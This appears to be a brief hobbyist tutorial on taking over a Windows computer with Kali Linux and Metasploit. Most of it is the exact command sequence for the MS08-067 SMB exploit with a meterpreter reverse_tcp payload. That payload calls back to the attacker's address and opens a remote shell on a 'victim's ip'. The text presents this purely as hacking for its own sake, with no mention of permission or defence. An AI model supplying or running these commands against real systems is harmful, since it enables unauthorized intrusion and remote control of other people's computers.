Introduction: Hack a Computer on Your Network With Kali Linux

Hey guys!

So you want to hack a computer and you've got Kali linux installed?

Then you are on the right place!

I am going to show you how to hack a computer.

Step 1: Start Kali Linux

Start Kali Linux and start a new terminal.

Step 2: Start the Metasploit Console

Start the Metasploit console by typing: msfconsole

This will take a few moments...

Step 3: The Commands:

So Metasploit started.

Here are the commands you need to type in:

use windows/smb/ms08_067_netapi

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST *Your ip adress* (If you don't know your ip adress then open a new terminal and type ifconfig. your ip adress will be somewhere in the output :D)

set LPORT 4444

set RHOST *victim's ip*

set RPORT 445


(You should connect)

Type help for a list of commands.

Step 4: That's It!

That's it!

You just hacked a computer!


I will probably make more tutorials about hacking and other ways to hack a computer.

So if this didn't work for you, stay tuned!

I think it only works for older versions of windows :(

Also please take a look at my Widows 7 hack tutorial!
